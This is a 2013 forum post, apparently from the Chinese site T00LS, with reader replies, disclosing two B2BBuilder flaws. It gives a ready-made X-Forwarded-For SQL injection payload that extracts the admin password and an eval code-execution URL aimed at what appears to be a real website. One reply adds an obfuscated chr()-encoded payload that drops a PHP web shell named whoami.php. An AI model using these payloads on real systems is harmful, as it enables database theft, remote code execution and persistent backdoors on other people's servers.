【我爱T00LS】B2BBuilder头注入后台任意代码执行

2013-09-23 16:25:46 31 4634


看到小伙伴们都在B2Bbuilder 我也凑个热闹
0x1 头注入

Include/function.php
function getip()



{



if (isset($_SERVER)) {



if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {



   $realip = $_SERVER['HTTP_X_FORWARDED_FOR'];



} elseif (isset($_SERVER['HTTP_CLIENT_IP'])) {



   $realip = $_SERVER['HTTP_CLIENT_IP'];



} else {



   $realip = $_SERVER['REMOTE_ADDR'];



}



} else {



if (getenv("HTTP_X_FORWARDED_FOR")) {



   $realip = getenv( "HTTP_X_FORWARDED_FOR");



} elseif (getenv("HTTP_CLIENT_IP")) {



   $realip = getenv("HTTP_CLIENT_IP");



} else {



   $realip = getenv("REMOTE_ADDR");



}



}



return $realip;



}
明显的头注入。。。。

构造头部测试:
x-forwarded-for:' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,password,user,0x27,0x7e) from b2bbuilder_admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1


0x2后台任意代码执行:admin/module_translations.php
if(empty($_POST))



{



$refer_lang = $_GET['code'] =='en'?'cn':'en';        //基本参照语言



$l = $rl = array();echo "start";



@include_once($config['webroot'].'/module/'.$_GET['mod'].'/lang/'.$_GET['code'].'.php');//got milk



@eval('$l =$_LANG_MOD_'.strtoupper($_GET['mod']).';');        



@include_once($config['webroot'].'/module/'.$_GET['mod'].'/lang/'.$refer_lang.'.php');



@eval('$rl =$_LANG_MOD_'.strtoupper($_GET['mod']).';');//got milk
在eval中用;就能分别执行两个命令,访问:http://www.jjgle.com/admin/module_translations.php?mod=;phpinfo()如图
类别 Web安全

关于作者

newbie008614篇文章307篇回复

newbie0086
31

评论31次

要评论?请先  登录  或  注册
  • 11楼
    loversorry
    Rank: 2
    2013-9-24 09:34

    一条龙的解决方案了。支持

  • 10楼
    cixin007
    Rank: 1
    2013-9-24 08:20

    撸主代码功底不错!

  • 9楼
    注册用户
    Rank: 2
    2013-9-24 08:20

    $server应该无视GPC的,不知道入库那里能不能直接 outfile?

  • 8楼
    注册用户
    Rank: 2
    2013-9-24 08:19

    应该不可以,不过你没事可以试试。

  • 7楼
    pr1nt
    Rank: 1
    2013-9-24 02:28

    赞,直接写一句话,弱弱地问下,不编码可以吗?

  • 6楼
    pr1nt
    Rank: 1
    2013-9-24 02:12

    楼主威武!!

  • 5楼
    lbjygo
    Rank: 1
    2013-9-24 01:54 

    eval(chr(102).chr(105).chr(108).chr(101).chr(95).chr(112).chr(117).chr(116).chr(95).chr(99).chr(111).chr(110).chr(116).chr(101).chr(110).chr(116).chr(115).chr(40).chr(39).chr(46).chr(47).chr(119).chr(104).chr(111).chr(97).chr(109).chr(105).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(49).chr(93).chr(41).chr(59).chr(63).chr(62).chr(39).chr(41).chr(59))
    在当前目录(/admin)下生成whoami.php 密码1

  • 4楼
    seaman
    Rank: 2
    2013-9-23 20:25

    我是不是说错了 好像可以get

  • 3楼
    seaman
    Rank: 2
    2013-9-23 20:25

    确实很霸道啊 不过代码执行那里不能getshell 有点遗憾

  • 2楼
    wepeng 广西大学(南宁) 学生
    Rank: 1
    2013-9-23 20:09

    呵呵,威武呀、、、、、、、、、、、、、、、、、

  • 1楼
    csser
    Rank: 1
    2013-9-23 18:13

    代码执行,威武。